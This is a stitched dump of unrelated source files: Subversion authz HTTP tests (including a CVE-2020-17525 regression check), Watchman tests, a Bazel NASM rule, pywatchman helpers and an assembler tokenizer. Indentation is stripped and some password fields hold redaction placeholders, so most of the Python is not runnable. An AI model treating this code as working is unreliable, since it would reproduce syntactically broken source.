{ 'path': '/repos/A/D/gamma', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/H', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/chi', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
# auth is configured and user2 is not allowed access to H
{ 'path': '', 'status': 301, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/', 'status': 200, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos', 'status': 301, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/', 'status': 200, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A', 'status': 301, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A/', 'status': 200, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A/D', 'status': 301, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H,
'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
# try with the wrong password for user2
{ 'path': '', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A/', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/gamma', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/H', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/chi', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
)
verify_gets(test_area_url, sallrany_tests)
# See comments on authn_sallrany test for some background on the interaction
# of Satisfy Any and the newer Require blocks.
@SkipUnless(svntest.main.is_httpd_authz_provider_enabled)
def authn_sallrall(sbox):
"test satisfy all require all config"
sbox.build(read_only = True, create_wc = False)
test_area_url = sbox.repo_url.replace('/svn-test-work/local_tmp/repos',
'/authz-test-work/sallrall')
write_authz_file(sbox)
allow_header = { 'ALLOW': '1' }
sallrall_tests = (
#anon access isn't allowed without ALLOW header
{ 'path': '', 'status': 403, },
{ 'path': '/', 'status': 403, },
{ 'path': '/repos', 'status': 403, },
{ 'path': '/repos/', 'status': 403, },
{ 'path': '/repos/A', 'status': 403, },
{ 'path': '/repos/A/', 'status': 403, },
{ 'path': '/repos/A/D', 'status': 403, },
{ 'path': '/repos/A/D/', 'status': 403, },
{ 'path': '/repos/A/D/gamma', 'status': 403, },
{ 'path': '/repos/A/D/H', 'status': 403, },
{ 'path': '/repos/A/D/H/', 'status': 403, },
{ 'path': '/repos/A/D/H/chi', 'status': 403, },
# auth is configured but no access is allowed without the ALLOW header
{ 'path': '', 'status': 403, 'user': user1, 'pw': user1_pass},
{ 'path': '/', 'status': 403, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos', 'status': 403, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/', 'status': 403, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A', 'status': 403, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/', 'status': 403, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D', 'status': 403, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/', 'status': 403, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/gamma', 'status': 403, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user1, 'pw': user1_pass},
# try with the wrong password for user1
{ 'path': '', 'status': 403, 'user': user1, 'pw': user1_badpass},
{ 'path': '/', 'status': 403, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos', 'status': 403, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/', 'status': 403, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A', 'status': 403, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/', 'status': 403, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D', 'status': 403, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/', 'status': 403, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/gamma', 'status': 403, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user1, 'pw': user1_badpass},
# auth is configured but no access is allowed without the ALLOW header
{ 'path': '', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/gamma', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user2, 'pw': user2_pass},
# try with the wrong password for user2
{ 'path': '', 'status': 403, 'user': user2, 'pw': user2_badpass},
{ 'path': '/', 'status': 403, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos', 'status': 403, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/', 'status': 403, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A', 'status': 403, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/', 'status': 403, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D', 'status': 403, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/', 'status': 403, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/gamma', 'status': 403, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user2, 'pw': user2_badpass},
# anon is not allowed even with ALLOW header
{ 'path': '', 'status': 401, 'headers': allow_header },
{ 'path': '/', 'status': 401, 'headers': allow_header },
{ 'path': '/repos', 'status': 401, 'headers': allow_header },
{ 'path': '/repos/', 'status': 401, 'headers': allow_header },
{ 'path': '/repos/A', 'status': 401, 'headers': allow_header },
{ 'path': '/repos/A/', 'status': 401, 'headers': allow_header },
{ 'path': '/repos/A/D', 'status': 401, 'headers': allow_header },
{ 'path': '/repos/A/D/', 'status': 401, 'headers': allow_header },
{ 'path': '/repos/A/D/gamma', 'status': 401, 'headers': allow_header },
{ 'path': '/repos/A/D/H', 'status': 401, 'headers': allow_header },
{ 'path': '/repos/A/D/H/', 'status': 401, 'headers': allow_header },
{ 'path': '/repos/A/D/H/chi', 'status': 401, 'headers': allow_header },
# auth is configured and user1 is allowed access repo including H
{ 'path': '', 'status': 301, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/', 'status': 200, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos', 'status': 301, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/', 'status': 200, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/A', 'status': 301, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/A/', 'status': 200, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/A/D', 'status': 301, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_H,
'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/H', 'status': 301, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/', 'status': 200, 'body': ls_of_H, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/chi', 'status': 200, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
# try with the wrong password for user1
{ 'path': '', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/A', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/A/', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/gamma', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/H', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/chi', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
# auth is configured and user2 is not allowed access to H
{ 'path': '', 'status': 301, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/', 'status': 200, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos', 'status': 301, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/', 'status': 200, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A', 'status': 301, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A/', 'status': 200, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A/D', 'status': 301, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H,
'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
# try with the wrong password for user2
{ 'path': '', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A/', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/gamma', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/H', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/chi', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
)
verify_gets(test_area_url, sallrall_tests)
@SkipUnless(svntest.main.is_ra_type_dav)
def repos_relative_access_file(sbox):
"repos-relative access file"
sbox.build()
test_area_url = sbox.repo_url.replace('/svn-test-work/repositories/',
'/authz-test-work/in-repos-authz/')
svntest.main.write_authz_file(sbox, {"/": "", "/A": "%s = rw" % user1})
shutil.move(sbox.authz_file, os.path.join(sbox.wc_dir, 'authz'))
sbox.simple_add('authz')
svntest.actions.run_and_verify_svn(None, [], 'relocate',
sbox.file_protocol_repo_url(), sbox.wc_dir)
sbox.simple_commit(message="adding in-repository authz rules file")
in_repos_authz_tests = (
{ 'path': '', 'status': 401, },
{ 'path': '/authz', 'status': 401, },
{ 'path': '/authz', 'user' : user1, 'pw' : <PASSWORD>,
'status': 403, },
{ 'path': '/A', 'user' : user1, 'pw' : <PASSWORD>,
'status': 301, },
{ 'path': '/A/', 'user' : user1, 'pw' : <PASSWORD>,
'status': 200, },
)
verify_gets(test_area_url, in_repos_authz_tests)
# test for the bug also known as CVE-2020-17525
@SkipUnless(svntest.main.is_ra_type_dav)
def nonexistent_repos_relative_access_file(sbox):
"repos-relative access file with bad repository URL"
sbox.build()
test_area_url = sbox.repo_url.replace('/svn-test-work/repositories/',
'/authz-test-work/in-repos-authz/')
# Construct a bad test-area URL to see what happens if we attempt to access
# a repository in a subdirectory which does not exist in SVNParentPath.
# This used to crash the server with a NULL-pointer dereference upon
# unauthenticated access.
test_area_url += '-this/does/not/exist'
svntest.main.write_authz_file(sbox, {"/": "", "/A": "%s = rw" % user1})
shutil.move(sbox.authz_file, os.path.join(sbox.wc_dir, 'authz'))
sbox.simple_add('authz')
svntest.actions.run_and_verify_svn(None, [], 'relocate',
sbox.file_protocol_repo_url(), sbox.wc_dir)
sbox.simple_commit(message="adding in-repository authz rules file")
# access is denied across the board since this repository does not exist
in_repos_authz_tests = (
{ 'path': '', 'status': 401, },
{ 'path': '/authz', 'status': 401, },
{ 'path': '/authz', 'user' : user1, 'pw' : <PASSWORD>1_pass,
'status': 403, },
{ 'path': '/A', 'user' : user1, 'pw' : <PASSWORD>1_pass,
'status': 403, },
{ 'path': '/A/', 'user' : user1, 'pw' : <PASSWORD>1_<PASSWORD>,
'status': 403, },
)
verify_gets(test_area_url, in_repos_authz_tests)
########################################################################
# Run the tests
# list all tests here, starting with None:
test_list = [ None,
anon,
mixed,
mixed_noauthwhenanon,
authn,
authn_anonoff,
authn_lcuser,
authn_group,
authn_sallrany,
authn_sallrall,
repos_relative_access_file,
nonexistent_repos_relative_access_file,
]
serial_only = True
if __name__ == '__main__':
svntest.main.run_tests(test_list)
# NOTREACHED
### End of file.
```
#### File: tests/cmdline/svneditor.py
```python
import sys
import os
def main():
if len(sys.argv) not in [2, 6]:
print("usage: svneditor.py file")
print(" svneditor.py base theirs mine merged wc_path")
print("arguments passed were: %s" % sys.argv)
sys.exit(1)
if len(sys.argv) == 2:
filename = sys.argv[1]
elif len(sys.argv) == 6:
filename = sys.argv[4]
# Read in the input file.
f = open(filename)
contents = f.read()
f.close()
funcname = os.environ['SVNTEST_EDITOR_FUNC']
func = sys.modules['__main__'].__dict__[funcname]
# Run the conversion.
contents = func(contents)
# Write edited version back to the file.
f = open(filename, 'w')
f.write(contents)
f.close()
return check_conflicts(contents)
def check_conflicts(contents):
markers = ['<<<<<<<', '=======', '>>>>>>>']
found = 0
for line in contents.split('\n'):
for marker in markers:
if line.startswith(marker):
found = found + 1
return found >= 3
def foo_to_bar(m):
return m.replace('foo', 'bar')
def append_foo(m):
return m + 'foo\n'
def identity(m):
return m
exitcode = main()
sys.exit(exitcode)
``` |
{
"source": "0xgpapad/tensorstore",
"score": 2
} |
#### File: 0xgpapad/tensorstore/rules_nasm.bzl
```python
def _nasm_one_file(ctx):
src = ctx.file.src
out = ctx.outputs.out
raw_includes = ctx.attr.raw_includes
# Compute the set of -I<> directories as the dirname of each include
# as well as the prefix of the path to the include.
includes = [x.dirname for x in ctx.files.includes]
for i in range(0, len(raw_includes)):
raw = raw_includes[i]
path = ctx.files.includes[i].path
if path.endswith(raw):
includes.append(path[:-len(raw)].rstrip("/"))
args = ctx.actions.args()
for h in depset(includes).to_list():
args.add("-I" + h + "/")
args.add_all(ctx.attr.flags)
args.add_all(["-o", out.path])
args.add(src.path)
inputs = [src] + ctx.files.includes
ctx.actions.run(
outputs = [out],
inputs = inputs,
executable = ctx.executable._nasm,
arguments = [args],
mnemonic = "NasmCompile",
progress_message = "Assembling " + src.short_path + " to create " + out.path,
)
nasm_one_file = rule(
attrs = {
"src": attr.label(allow_single_file = [".asm"]),
"includes": attr.label_list(allow_files = True),
"flags": attr.string_list(),
"raw_includes": attr.string_list(),
"_nasm": attr.label(
default = "@nasm//:nasm",
executable = True,
cfg = "host",
),
},
outputs = {"out": "%{name}.o"},
implementation = _nasm_one_file,
)
def nasm_library(name, srcs = [], includes = [], flags = [], linkstatic = 1, **kwargs):
for src in srcs:
nasm_one_file(
name = src[:-len(".asm")],
src = src,
includes = includes,
flags = flags,
raw_includes = includes,
)
native.cc_library(
name = name,
srcs = [src.replace(".asm", ".o") for src in srcs],
linkstatic = linkstatic,
**kwargs
)
``` |
{
"source": "0xgpapad/watchman",
"score": 2
} |
#### File: watchman/integration/test_name.py
```python
import os
import pywatchman
import WatchmanTestCase
@WatchmanTestCase.expand_matrix
class TestNameExpr(WatchmanTestCase.WatchmanTestCase):
def test_name_expr(self):
root = self.mkdtemp()
self.touchRelative(root, "foo.c")
os.mkdir(os.path.join(root, "subdir"))
self.touchRelative(root, "subdir", "bar.txt")
self.watchmanCommand("watch", root)
self.assertFileListsEqual(
self.watchmanCommand(
"query", root, {"expression": ["iname", "FOO.c"], "fields": ["name"]}
)["files"],
["foo.c"],
)
self.assertFileListsEqual(
self.watchmanCommand(
"query",
root,
{"expression": ["iname", ["FOO.c", "INVALID.txt"]], "fields": ["name"]},
)["files"],
["foo.c"],
)
self.assertFileListsEqual(
self.watchmanCommand(
"query", root, {"expression": ["name", "foo.c"], "fields": ["name"]}
)["files"],
["foo.c"],
)
self.assertFileListsEqual(
self.watchmanCommand(
"query",
root,
{"expression": ["name", ["foo.c", "invalid"]], "fields": ["name"]},
)["files"],
["foo.c"],
)
self.assertFileListsEqual(
self.watchmanCommand(
"query",
root,
{"expression": ["name", "foo.c", "wholename"], "fields": ["name"]},
)["files"],
["foo.c"],
)
if self.isCaseInsensitive():
self.assertFileListsEqual(
self.watchmanCommand(
"query",
root,
{"expression": ["name", "Foo.c", "wholename"], "fields": ["name"]},
)["files"],
["foo.c"],
)
self.assertFileListsEqual(
self.watchmanCommand(
"query",
root,
{"expression": ["name", "bar.txt", "wholename"], "fields": ["name"]},
)["files"],
[],
)
self.assertFileListsEqual(
self.watchmanCommand(
"query",
root,
{
"expression": ["name", "bar.txt", "wholename"],
"relative_root": "subdir",
"fields": ["name"],
},
)["files"],
["bar.txt"],
)
# foo.c is not in subdir so this shouldn't return any matches
self.assertFileListsEqual(
self.watchmanCommand(
"query",
root,
{
"expression": ["name", "foo.c", "wholename"],
"relative_root": "subdir",
"fields": ["name"],
},
)["files"],
[],
)
with self.assertRaises(pywatchman.WatchmanError) as ctx:
self.watchmanCommand("query", root, {"expression": "name"})
self.assertRegex(str(ctx.exception), "Expected array for 'i?name' term")
with self.assertRaises(pywatchman.WatchmanError) as ctx:
self.watchmanCommand(
"query", root, {"expression": ["name", "one", "two", "three"]}
)
self.assertRegex(
str(ctx.exception), "Invalid number of arguments for 'i?name' term"
)
with self.assertRaises(pywatchman.WatchmanError) as ctx:
self.watchmanCommand("query", root, {"expression": ["name", 2]})
self.assertRegex(
str(ctx.exception),
("Argument 2 to 'i?name' must be either a string " "or an array of string"),
)
with self.assertRaises(pywatchman.WatchmanError) as ctx:
self.watchmanCommand("query", root, {"expression": ["name", "one", 2]})
self.assertRegex(str(ctx.exception), "Argument 3 to 'i?name' must be a string")
with self.assertRaises(pywatchman.WatchmanError) as ctx:
self.watchmanCommand(
"query", root, {"expression": ["name", "one", "invalid"]}
)
self.assertRegex(
str(ctx.exception), "Invalid scope 'invalid' for i?name expression"
)
```
#### File: watchman/integration/test_restrictions.py
```python
import os
import pywatchman
import WatchmanInstance
import WatchmanTestCase
@WatchmanTestCase.expand_matrix
class TestWatchRestrictions(WatchmanTestCase.WatchmanTestCase):
def test_rootRestrict(self):
config = {"root_restrict_files": [".git", ".foo"]}
expect = [
("directory", ".git", True),
("file", ".foo", True),
("directory", ".foo", True),
(None, None, False),
("directory", ".svn", False),
("file", "baz", False),
]
self.runWatchTests(config=config, expect=expect)
def runWatchTests(self, config, expect):
with WatchmanInstance.Instance(config=config) as inst:
inst.start()
client = self.getClient(inst)
for filetype, name, expect_pass in expect:
for watch_type in ["watch", "watch-project"]:
# encode the test criteria in the dirname so that we can
# figure out which test scenario failed more easily
d = self.mkdtemp(
suffix="-%s-%s-%s-%s"
% (filetype, name, expect_pass, watch_type)
)
if filetype == "directory":
os.mkdir(os.path.join(d, name))
elif filetype == "file":
self.touchRelative(d, name)
assert_functions = {
(True, "watch"): self.assertWatchSucceeds,
(True, "watch-project"): self.assertWatchProjectSucceeds,
(False, "watch"): self.assertWatchIsRestricted,
(False, "watch-project"): self.assertWatchProjectIsRestricted,
}
assert_function = assert_functions[(expect_pass, watch_type)]
assert_function(inst, client, d)
def assertWatchSucceeds(self, inst, client, path):
client.query("watch", path)
def assertWatchProjectSucceeds(self, inst, client, path):
client.query("watch-project", path)
def assertWatchIsRestricted(self, inst, client, path):
with self.assertRaises(pywatchman.WatchmanError) as ctx:
client.query("watch", path)
message = str(ctx.exception)
self.assertIn("unable to resolve root {0}".format(path), message)
self.assertIn(
(
"Your watchman administrator has configured watchman to "
+ "prevent watching path `{0}`"
).format(path),
message,
)
self.assertIn(
"None of the files listed in global config root_files are present "
+ "and enforce_root_files is set to true.",
message,
)
self.assertIn(
"root_files is defined by the `{0}` config file".format(inst.cfg_file),
message,
)
self.assertIn(
"config file and includes `.watchmanconfig`, `.git`, and `.foo`.", message
)
self.assertIn(
"One or more of these files must be present in order to allow a "
+ "watch. Try pulling and checking out a newer version of the "
+ "project?",
message,
)
def assertWatchProjectIsRestricted(self, inst, client, path):
with self.assertRaises(pywatchman.WatchmanError) as ctx:
client.query("watch-project", path)
message = str(ctx.exception)
self.assertIn(
(
"None of the files listed in global config root_files are "
+ "present in path `{0}` or any of its parent directories."
).format(path),
message,
)
self.assertIn(
"root_files is defined by the `{0}` config file".format(inst.cfg_file),
message,
)
self.assertIn(
"config file and includes `.watchmanconfig`, `.git`, and `.foo`.", message
)
self.assertIn(
"One or more of these files must be present in order to allow a "
+ "watch. Try pulling and checking out a newer version of the "
+ "project?",
message,
)
def test_invalidRoot(self):
d = self.mkdtemp()
invalid = os.path.join(d, "invalid")
with self.assertRaises(pywatchman.WatchmanError) as ctx:
self.watchmanCommand("watch", invalid)
msg = str(ctx.exception)
if "No such file or directory" in msg:
# unix
return
if "The system cannot find the file specified" in msg:
# windows
return
self.assertTrue(False, msg)
```
#### File: python/pywatchman/encoding.py
```python
import sys
from . import compat
"""Module to deal with filename encoding on the local system, as returned by
Watchman."""
if compat.PYTHON3:
default_local_errors = "surrogateescape"
def get_local_encoding():
if sys.platform == "win32":
# Watchman always returns UTF-8 encoded strings on Windows.
return "utf-8"
# On the Python 3 versions we support, sys.getfilesystemencoding never
# returns None.
return sys.getfilesystemencoding()
else:
# Python 2 doesn't support surrogateescape, so use 'strict' by
# default. Users can register a custom surrogateescape error handler and use
# that if they so desire.
default_local_errors = "strict"
def get_local_encoding():
if sys.platform == "win32":
# Watchman always returns UTF-8 encoded strings on Windows.
return "utf-8"
fsencoding = sys.getfilesystemencoding()
if fsencoding is None:
# This is very unlikely to happen, but if it does, just use UTF-8
fsencoding = "utf-8"
return fsencoding
def encode_local(s):
return s.encode(get_local_encoding(), default_local_errors)
def decode_local(bs):
return bs.decode(get_local_encoding(), default_local_errors)
``` |
{
"source": "0xGREG/Assembler",
"score": 3
} |
#### File: Assembler/assembler/Assembler.py
```python
from enum import Enum
from collections import namedtuple
import string
from assembler.formats._bin import BIN
from assembler.formats._elf import ELF
class AssemblerException(Exception):
pass
def setup(initialParameters):
processor = Processor(initialParameters)
processor.tokenize()
if initialParameters.verbose:
print('TOKENS:\n')
print("{: <8} {: <25} {}\n".format(
'LINE', 'TYPE', 'VALUE'))
for token in processor.tokens:
token.print()
print()
return processor
class tokenInfo:
def __init__(self, type, value):
self.value = value
self.type = type
class TYPES(Enum):
UNKNOWN = -1
COMMA = 0
INT = 1
STRING = 2
INSTRUCTION = 3
LABEL = 4
class Token:
def __init__(self, value, lineNumber):
self.setFunctionAssignments()
info = self.getTokenInfo(value)
self.type = info.type
self.value = info.value
self.lineNumber = lineNumber
def print(self):
print("{: <8} {: <25} {}".format(
self.lineNumber, self.type, self.value))
def setFunctionAssignments(self):
self.typeFunctions = [
self.checkComma,
self.checkNumber,
self.checkString,
self.checkLabel,
self.checkInstruction
]
def getTokenInfo(self, value):
for type in self.typeFunctions:
verifiedType = type(value)
if (verifiedType != None):
return verifiedType
return tokenInfo(TYPES.UNKNOWN, value)
def checkComma(self, value):
if len(value) == 1 and value[0] == ',':
return tokenInfo(TYPES.COMMA, ',')
return None
def checkNumber(self, value):
variant = 'dec'
if len(value) > 2 and value[0:2] == '0x':
variant = 'hex'
digits = ''
finalValue = -1
if variant == 'dec':
for character in value:
if character in string.digits:
digits += character
else:
return None
finalValue = int(digits)
elif variant == 'hex':
for character in value[2:]:
if character in string.hexdigits:
digits += character
else:
return None
finalValue = int(digits, 16)
return tokenInfo(TYPES.INT, finalValue)
def checkString(self, value):
if len(value) < 2:
return None
if(value[0] in '"' and value[-1] == '"'):
return tokenInfo(TYPES.STRING, value)
return None
def checkInstruction(self, value):
for character in value:
if character not in string.ascii_uppercase:
return None
return tokenInfo(TYPES.INSTRUCTION, value)
def checkLabel(self, value):
if len(value) < 2:
return None
if(value[0] is '.'):
for character in value[1:]:
if character not in string.ascii_letters:
break
return tokenInfo(TYPES.LABEL, value)
return None
class Processor:
def __init__(self, initialParameters):
self.parameters = initialParameters
self.lines = []
self.tokens = []
self.dataBuffer = []
self.labels = {}
self.currentAddress = 0
self.readInputFile()
def tokenize(self):
for i in range(len(self.lines)):
self.parse(i+1, self.lines[i])
def readInputFile(self):
for line in self.parameters.inputFile:
self.lines.append(line)
self.parameters.inputFile.close()
def removeStartingWhitespaces(self, line, position, lineLength):
while position < lineLength and line[position] in '\t \n':
position += 1
return position
def getToken(self, lineNumber, line, position, lineLength):
text = ''
parametersDelimiters = '\t\n, '
# if not at the end of the line check if next argument is not a comma
if position < lineLength:
if line[position] == ',':
text = ','
position += 1
elif line[position] in '"\'':
delimiter = line[position]
isString = True
parametersDelimiters = '\t\n,'
text += '"'
position += 1
else:
isString = False
# if it's not a comma then process argument
if text != ',':
# ignore comments
if position < lineLength and line[position] == '#':
position = lineLength
while position < lineLength and line[position] not in parametersDelimiters:
text += line[position]
position += 1
if isString and line[position-1] == delimiter:
if (delimiter == '\''):
text = text[:-1] + '"'
break
if text != '':
token = Token(text, lineNumber)
self.tokens.append(token)
return position
def parse(self, lineNumber, line):
lineLength = len(line)
if lineLength == 0:
return False
position = 0
while position < lineLength:
position = self.removeStartingWhitespaces(
line, position, lineLength)
position = self.getToken(lineNumber, line, position, lineLength)
def process(self):
supportedFormats = {
'bin': BIN,
'elf': ELF
}
fileFormat = supportedFormats[self.parameters.fileFormat](
self.parameters)
fileFormat.generateTemplate()
self.currentAddress = fileFormat.getOrg()
self.index = 0
while self.index < len(self.tokens):
self.assemble()
# if file doesn't have .start label specified, set starting address to 0
try:
startingPoint = self.labels['.start']
except KeyError:
startingPoint = 0
self.dataBuffer = fileFormat.addFormatData(
self.dataBuffer, startingPoint)
def write(self):
